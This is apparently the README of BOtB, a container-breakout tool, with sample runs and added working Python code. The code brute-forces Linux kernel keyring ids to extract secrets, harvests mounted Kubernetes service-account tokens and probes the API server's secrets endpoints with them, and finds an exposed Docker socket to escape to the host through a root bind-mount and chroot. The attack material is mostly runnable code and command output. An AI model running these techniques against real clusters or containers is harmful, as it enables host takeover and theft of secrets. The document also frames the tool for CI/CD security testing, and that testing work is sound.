BOtB (Break Out The Box) is a CLI tool that lets you:
Exploit common container vulnerabilities
Perform common container post-exploitation actions
Provide capabilities when certain tools or binaries are not available inside the container
Use BOtB's capabilities together with CI/CD techniques to test container deployments
Perform the above either manually or in an automated fashion
./botb-linux-amd64 -h
-aggr string
Attempt to exploit RuncPWN (default "nil")
-always-succeed
Always set BOtB's Exit code to Zero
-autopwn
Attempt to autopwn exposed sockets
-cicd
Attempt to autopwn but don't drop to TTY,return exit code 1 if successful else 0
-config string
Load config from provided yaml file (default "nil")
-endpoints string
Provide a textfile with endpoints to use for test (default "nil")
-find-docker
Attempt to find Dockerd
-find-http
Hunt for Available UNIX Domain Sockets with HTTP
-find-sockets
Hunt for Available UNIX Domain Sockets
-hijack string
Attempt to hijack binaries on host (default "nil")
-k8secrets
Identify and Verify K8's Secrets
-keyMax int
Maximum key id range (default 100000000) and max system value is 999999999 (default 100000000)
-keyMin int
Minimum key id range (default 1) (default 1)
-metadata
Attempt to find metadata services
-path string
Path to Start Scanning for UNIX Domain Sockets (default "/")
-pwn-privileged string
Provide a command payload to try exploit --privilege CGROUP release_agent's (default "nil")
-pwnKeyctl
Abuse keyctl syscalls and extract data from Linux Kernel keyrings
-recon
Perform Recon of the Container ENV
-region string
Provide a AWS Region e.g eu-west-2 (default "nil")
-rev-dns string
Perform reverse DNS lookups on a subnet. Parameter must be in CIDR notation, e.g., -rev-dns 192.168.0.0/24 (default "nil")
-s3bucket string
Provide a bucket name for S3 Push (default "nil")
-s3push string
Push a file to S3 e.g Full command to push to https://YOURBUCKET.s3.eu-west-2.amazonaws.com/FILENAME would be: -region eu-west-2 -s3bucket YOURBUCKET -s3push FILENAME (default "nil")
-scrape-gcp
Attempt to scrape the GCP metadata service
-verbose
Verbose output
-wordlist string
Provide a wordlist (default "nil")
BOtB can also load its settings from a YAML file via the -config parameter:
#./botb-linux-amd64 -config=cfg.yml
[+] Break Out The Box
[+] Loading Config: cfg.yml
...
Identify and extract Linux kernel keyring secrets that are not properly protected:
#./botb-linux-amd64 -pwnKeyctl=true -keyMin=0 -keyMax=100000000
[+] Break Out The Box
[*] Attempting to Identify and Extract Keyring Values
[!] WARNING, this can be resource intensive and your pod/container process may be killed, iterate over min and max with 100000000 increments to be safe
[!] Subkey description for key [251133632]: user;0;0;3f010000;brompwnie_secret
[!] Output {
"KeyId": 13738777,
"Valid": true,
"Name": "_ses.e326b8816c24d0ddda6c2c82ecf62ea2302a7239fce2fd104775d154a97fa3d6",
"Type": "keyring",
"Uid": "0",
"Gid": "0",
"Perms": "3f1b0000",
"String_Content": "\ufffd\ufffd\ufffd\u000e",
"Byte_Content": "wP73Dg==",
"Comments": null,
"Subkeys": [
{
"KeyId": 251133632,
"Valid": true,
"Name": "brompwnie_secret",
"Type": "user",
"Uid": "0",
"Gid": "0",
"Perms": "3f010000",
"String_Content": "thetruthisialsoreallyliketrees",
"Byte_Content": "dGhldHJ1dGhpc2lhbHNvcmVhbGx5bGlrZXRyZWVz",
"Comments": null,
"Subkeys": null,
"Output": ""
}
],
"Output": ""
}
[+] Finished
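The keyring run above works by brute-forcing key ids and describing each one. The following Python is an added example (not BOtB's own code) of that technique: it calls keyctl(2) directly through ctypes, parses the `type;uid;gid;perms;description` strings the kernel returns (the format of the "Subkey description" line above), decodes the permission mask so you can see which subject may actually read a key (`3f010000` = possessor everything, user view only), reads the payload of `user` keys, and splits a large range into the 100000000-sized windows the warning recommends. Assumptions: x86_64 Linux (syscall number 250) and a libc reachable via ctypes; when keyctl itself is denied (seccomp returns EPERM) the scan stops rather than spinning through the whole range.

```python
import ctypes
import errno
import os
import sys
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Constants from <linux/keyctl.h>; the syscall number is x86_64's (assumption: x86_64 only).
KEYCTL_DESCRIBE = 6
KEYCTL_READ = 11
SYS_KEYCTL_X86_64 = 250
# One permission byte per subject (possessor/user/group/other); bit names per subject.
PERM_BITS = [("view", 0x01), ("read", 0x02), ("write", 0x04),
             ("search", 0x08), ("link", 0x10), ("setattr", 0x20)]


@dataclass
class KeyDesc:
    key_id: int
    ktype: str
    uid: int
    gid: int
    perms: str          # 8 hex digits as printed by KEYCTL_DESCRIBE, e.g. "3f010000"
    description: str


def parse_describe(key_id: int, text: str) -> KeyDesc:
    """Parse a KEYCTL_DESCRIBE string: 'type;uid;gid;perms;description'.
    The description itself may contain ';', so split at most four times."""
    parts = text.split(";", 4)
    if len(parts) != 5:
        raise ValueError(f"unexpected describe format: {text!r}")
    ktype, uid, gid, perms, desc = parts
    return KeyDesc(key_id, ktype, int(uid), int(gid), perms, desc)


def decode_perms(perms: str) -> dict:
    """Expand the hex mask into the rights each subject holds (possessor byte is the high byte)."""
    value = int(perms, 16)
    out = {}
    for shift, subject in ((24, "possessor"), (16, "user"), (8, "group"), (0, "other")):
        byte = (value >> shift) & 0xFF
        out[subject] = [name for name, bit in PERM_BITS if byte & bit]
    return out


def chunks(key_min: int, key_max: int, step: int = 100_000_000) -> List[Tuple[int, int]]:
    """Split a key-id range into the windows the tool's resource warning recommends."""
    out, lo = [], key_min
    while lo <= key_max:
        hi = min(lo + step - 1, key_max)
        out.append((lo, hi))
        lo = hi + 1
    return out


def _keyctl(libc, op: int, key_id: int, buf, buflen: int) -> Tuple[int, int]:
    res = libc.syscall(ctypes.c_long(SYS_KEYCTL_X86_64), ctypes.c_long(op),
                       ctypes.c_long(key_id), buf, ctypes.c_size_t(buflen), ctypes.c_long(0))
    return res, ctypes.get_errno()


def describe_key(libc, key_id: int) -> Tuple[Optional[str], int]:
    buf = ctypes.create_string_buffer(4096)
    res, err = _keyctl(libc, KEYCTL_DESCRIBE, key_id, buf, len(buf))
    return (None, err) if res < 0 else (buf.value.decode(errors="replace"), 0)


def read_key(libc, key_id: int) -> Optional[bytes]:
    buf = ctypes.create_string_buffer(65536)
    res, _ = _keyctl(libc, KEYCTL_READ, key_id, buf, len(buf))
    return None if res < 0 else buf.raw[:min(res, len(buf))]


def scan_keys(key_min: int, key_max: int) -> List[Tuple[KeyDesc, Optional[bytes]]]:
    """Brute-force key ids: describe each, read payloads of 'user' keys we may access.
    Returns [] outside x86_64 Linux instead of guessing another syscall number."""
    if sys.platform != "linux" or os.uname().machine != "x86_64":
        return []
    libc = ctypes.CDLL(None, use_errno=True)
    libc.syscall.restype = ctypes.c_long
    found = []
    for key_id in range(key_min, key_max + 1):
        text, err = describe_key(libc, key_id)
        if text is None:
            if err == errno.EPERM:   # keyctl denied outright (e.g. seccomp): nothing to gain
                break
            continue                 # ENOKEY: no such id; EACCES: exists, not viewable by us
        desc = parse_describe(key_id, text)
        payload = read_key(libc, key_id) if desc.ktype == "user" else None
        found.append((desc, payload))
    return found


if __name__ == "__main__":
    for lo, hi in chunks(1, 100_000_000):
        for desc, payload in scan_keys(lo, hi):
            print(desc, decode_perms(desc.perms), payload)
```

A pure-Python loop over 100000000 ids is far slower than the Go tool, so treat the `chunks` windows as a sanity limit rather than a speed trick; the point of the example is the describe/read/permission logic, and the EPERM short-circuit that a naive scanner lacks.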
Identify and verify mounted Kubernetes service account secrets:
#./botb-linux-amd64 -k8secrets=true
[+] Break Out The Box
[*] Identifying and Verifying K8's Secrets
[!] Token found at: /var/run/secrets/kubernetes.io/serviceaccount/token
[!] Token found at: /run/secrets/kubernetes.io/serviceaccount/token
[*] Trying: https://kubernetes.default/api/v1
[!] Valid response with token (xxxxxxxxxx...)on -> https://kubernetes.default/api/v1
[*] Trying: https://kubernetes.default/api/v1/namespaces
[*] Trying: https://kubernetes.default/api/v1/namespaces/default/secrets
[*] Trying: https://kubernetes.default/api/v1/namespaces/default/pods
[*] Trying: https://kubernetes.default/api/v1
[!] Valid response with token (xxxxxxxxxx...)on -> https://kubernetes.default/api/v1
[*] Trying: https://kubernetes.default/api/v1/namespaces
[*] Trying: https://kubernetes.default/api/v1/namespaces/default/secrets
[*] Trying: https://kubernetes.default/api/v1/namespaces/default/pods
[+] Finished
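The -k8secrets run above does three things: find the mounted token, send it as a bearer token to the API server, and report which paths answer. The Python below is an added example of the same procedure (not BOtB's code). It goes one step further than the output above, which hardcodes the `default` namespace: it decodes the token's JWT claims (without verifying the signature, which is the API server's job) to learn the service account's own namespace and probes that namespace's secrets and pods, and it classifies 200 / 401 / 403 so "valid" is not confused with "authenticated but forbidden". Assumptions: the cluster CA at `/var/run/secrets/kubernetes.io/serviceaccount/ca.crt` (the standard mount, not shown on the page) and the constructed `SAMPLE_TOKEN`; the HTTP probes only succeed from inside a pod.

```python
import base64
import json
import os
import ssl
import urllib.request
from typing import List, Optional
from urllib.error import HTTPError, URLError

API = "https://kubernetes.default"
# The two locations the tool reports; on most nodes the second is the symlink target of the first.
TOKEN_PATHS = [
    "/var/run/secrets/kubernetes.io/serviceaccount/token",
    "/run/secrets/kubernetes.io/serviceaccount/token",
]
CA_PATH = "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"   # assumption: standard mount


def find_tokens(paths: List[str] = TOKEN_PATHS) -> List[str]:
    return [p for p in paths if os.path.isfile(p)]


def _b64url_decode(s: str) -> bytes:
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def token_claims(token: str) -> dict:
    """Decode the JWT payload WITHOUT verifying the signature: we only want the
    namespace / service-account hints; the API server does the real verification."""
    parts = token.strip().split(".")
    if len(parts) != 3:
        raise ValueError("not a JWT")
    return json.loads(_b64url_decode(parts[1]))


def sa_namespace(claims: dict) -> str:
    """Legacy tokens carry a flat claim; bound (projected) tokens nest it under 'kubernetes.io'."""
    legacy = claims.get("kubernetes.io/serviceaccount/namespace")
    bound = claims.get("kubernetes.io", {}).get("namespace")
    return legacy or bound or "default"


def probe_paths(namespace: str) -> List[str]:
    """The endpoints the tool output tries, with the token's own namespace instead of 'default'."""
    return ["/api/v1", "/api/v1/namespaces",
            f"/api/v1/namespaces/{namespace}/secrets",
            f"/api/v1/namespaces/{namespace}/pods"]


def probe(path: str, token: str, api: str = API, cafile: str = CA_PATH,
          timeout: float = 5) -> Optional[int]:
    """GET api+path with the bearer token; HTTP status, or None if unreachable.
    The cluster CA is pinned when mounted so a spoofed API server cannot feed fake results."""
    ctx = ssl.create_default_context(cafile=cafile if os.path.isfile(cafile) else None)
    req = urllib.request.Request(api + path, headers={"Authorization": "Bearer " + token})
    try:
        with urllib.request.urlopen(req, context=ctx, timeout=timeout) as resp:
            return resp.status
    except HTTPError as e:
        return e.code
    except URLError:
        return None


def classify(status: Optional[int]) -> str:
    if status is None:
        return "unreachable"
    if status == 200:
        return "valid: token accepted and authorized"
    if status == 401:
        return "token rejected"
    if status == 403:
        return "token authenticated but not authorized for this path"
    return f"HTTP {status}"


def verify_tokens(paths: List[str] = TOKEN_PATHS, api: str = API) -> dict:
    """Mirror of the -k8secrets run: every token found, every probe path, one verdict each."""
    results = {}
    for token_path in find_tokens(paths):
        with open(token_path) as fh:
            token = fh.read().strip()
        ns = sa_namespace(token_claims(token))
        results[token_path] = {p: classify(probe(p, token, api)) for p in probe_paths(ns)}
    return results


# Constructed sample token (header.payload.signature; the signature is junk) for offline use.
def _b64url(b: bytes) -> str:
    return base64.urlsafe_b64encode(b).rstrip(b"=").decode()


SAMPLE_TOKEN = ".".join([
    _b64url(json.dumps({"alg": "RS256", "kid": "constructed"}).encode()),
    _b64url(json.dumps({
        "iss": "kubernetes/serviceaccount",
        "kubernetes.io/serviceaccount/namespace": "default",
        "kubernetes.io/serviceaccount/service-account.name": "default",
        "sub": "system:serviceaccount:default:default",
    }).encode()),
    _b64url(b"not-a-real-signature"),
])

if __name__ == "__main__":
    for token_path, verdicts in verify_tokens().items():
        print(token_path)
        for p, v in verdicts.items():
            print(f"  {p}: {v}")
```

Note that `token_claims` is deliberately signature-blind: an attacker in the pod does not need to trust the token, only to present it. A 403 on `.../secrets` with a 200 on `/api/v1` is the common case for a default service account and is a much weaker finding than a 200 on secrets.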
Escape from the container through an exposed Docker daemon socket:
#./botb-linux-amd64 -autopwn=true
[+] Break Out The Box
[+] Attempting to autopwn
[+] Hunting Docker Socks
[+] Attempting to autopwn: /var/meh
[+] Attempting to escape to host...
[+] Attempting in TTY Mode
./docker/docker -H unix:///var/meh run -t -i -v /:/host alpine:latest /bin/sh
chroot /host && clear
echo 'You are now on the underlying host'
You are now on the underlying host
/ #
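The autopwn above is three steps: find UNIX domain sockets, decide which of them is dockerd, then run a container with the host root bind-mounted and chroot into it. The Python below is an added example of that discovery logic (not BOtB's code): it walks the filesystem for sockets (`-find-sockets`/`-path`), speaks HTTP over each socket (`-find-http`), treats a `GET /version` that returns JSON with `ApiVersion` as dockerd (`-find-docker`), and builds, but does not execute, the same `docker run -v /:/host` argv the tool runs. `/var/meh` on the page is just an arbitrary socket path, so the example uses a temp directory; the fake dockerd at the bottom is a constructed stand-in so the whole thing runs offline.

```python
import http.client
import http.server
import json
import os
import socket
import stat
import tempfile
import threading

SKIP_DIRS = {"/proc", "/sys", "/dev"}   # pseudo filesystems: nothing to find, slow to walk


def find_unix_sockets(root="/"):
    """Walk the tree and return every UNIX domain socket path (-find-sockets -path ROOT)."""
    found = []
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda _e: None):
        dirnames[:] = [d for d in dirnames if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                if stat.S_ISSOCK(os.lstat(path).st_mode):
                    found.append(path)
            except OSError:
                pass
    return found


class UnixHTTPConnection(http.client.HTTPConnection):
    """http.client over AF_UNIX instead of TCP."""
    def __init__(self, path, timeout=3):
        super().__init__("localhost", timeout=timeout)
        self.unix_path = path

    def connect(self):
        self.sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        self.sock.settimeout(self.timeout)
        self.sock.connect(self.unix_path)


def probe_http(path):
    """GET /version down the socket: (status, body) if it speaks HTTP, else None (-find-http)."""
    conn = UnixHTTPConnection(path)
    try:
        conn.request("GET", "/version")
        resp = conn.getresponse()
        return resp.status, resp.read()
    except (OSError, http.client.HTTPException):
        return None
    finally:
        conn.close()


def is_docker(path):
    """dockerd answers GET /version with a JSON object carrying ApiVersion (-find-docker)."""
    result = probe_http(path)
    if result is None:
        return False
    status, body = result
    try:
        info = json.loads(body)
    except ValueError:
        return False
    return status == 200 and isinstance(info, dict) and "ApiVersion" in info


def escape_command(sock_path):
    """The argv the autopwn runs; 'chroot /host' inside the resulting shell lands on the host."""
    return ["docker", "-H", f"unix://{sock_path}", "run", "-t", "-i",
            "-v", "/:/host", "alpine:latest", "/bin/sh"]


# --- constructed stand-in for dockerd, only so the discovery logic can be exercised offline ---
class _UnixHTTPServer(http.server.HTTPServer):
    address_family = socket.AF_UNIX

    def server_bind(self):            # HTTPServer's version expects a (host, port) tuple
        self.socket.bind(self.server_address)
        self.server_name, self.server_port = "fake-dockerd", 0


class _FakeDockerdHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):
        body = json.dumps({"Version": "0.0.0-constructed", "ApiVersion": "1.43"}).encode()
        self.send_response(200)
        self.send_header("Content-Type", "application/json")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *_args):    # client_address is '' on AF_UNIX; default logger would fail
        pass


def demo():
    """Start the fake daemon under a temp dir, discover it, and return what autopwn would run."""
    root = tempfile.mkdtemp(prefix="botb-demo-")
    sock_path = os.path.join(root, "docker.sock")
    server = _UnixHTTPServer(sock_path, _FakeDockerdHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        sockets = find_unix_sockets(root)
        docker = [p for p in sockets if is_docker(p)]
        return {"sockets": sockets, "docker": docker,
                "escape": escape_command(docker[0]) if docker else None}
    finally:
        server.shutdown()
        server.server_close()
        os.unlink(sock_path)
        os.rmdir(root)


if __name__ == "__main__":
    print(demo())
```

The `chroot /host` step only reaches the host when the socket belongs to the host's dockerd; a socket that merely proxies a rootless or Docker-in-Docker daemon gives you that daemon's root, which is why checking `/version` is a hint, not proof, and the tool's TTY drop is where you confirm it.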
Container escape in a CI/CD-friendly way: with -cicd, BOtB attempts the same autopwn but does not drop into a TTY, and exits with code 1 if the escape succeeded and 0 otherwise, so a pipeline can fail the build on a successful breakout (add -always-succeed if you only want the result logged).